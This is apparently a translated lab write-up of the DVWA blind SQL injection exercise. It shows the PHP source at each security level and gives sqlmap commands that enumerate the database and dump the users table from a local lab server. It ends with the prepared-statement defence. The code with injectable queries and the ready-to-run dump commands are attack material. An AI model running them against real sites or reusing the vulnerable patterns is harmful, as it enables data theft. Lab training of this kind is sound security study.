Hirofumi in the past:
DVWA shooting range-Brute Force Source brute force cracking
DVWA shooting range-Command Injection
DVWA range-CSRF cross-site request forgery
DVWA range-File Inclusion file contains
DVWA shooting range-File Upload
DVWA shooting range-SQL Injection
Setting up of shooting range environment
https://github.com/ethicalhack3r/DVWA
[Network Security Study Articles Attached]: DVWA shooting range construction
table of Contents
Impossible SQL Injection (Blind)
SQL Injection (Blind)
Low SQL Injection (Blind)
Core code
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// 获取id值
$id = $_GET[ 'id' ];
// 查询数据库
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid );
// 得到结果
$num = @mysqli_num_rows( $result );
if( $num > 0 ) {
echo '<pre>User ID exists in the database.</pre>';
}
else {
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Since sql blind injection is a waste of time, the author uses the sqlmap tool for injection here
List the current database name
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db
List table name
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables
Get the data in the users table
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch
Medium SQL Injection (Blind)
Core code
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?>
It can be clearly seen that the submission method here has changed from the original get to post
Use bp to capture the packet, capture the data packet requested by the post, and save it to the post.r file
vim post.r
sqlmap -r post.r -D dvwa1 -T users --dump --batch
High SQL Injection (Blind)
Core code
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Compared with the previous two, the id value here is passed by the cookie, and the sleep time is set, which increases the time consumption of blind injection
Get the current database name
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db
As for the user name and password, I won’t repeat them here because it’s too time-consuming
Impossible SQL Injection (Blind)
Core code
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
It can be seen that impossible prepare and PDO defend against SQL and injection, and at the same time add a token verification mechanism to further improve its security
https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31
https://www.freebuf.com/articles/web/119467.html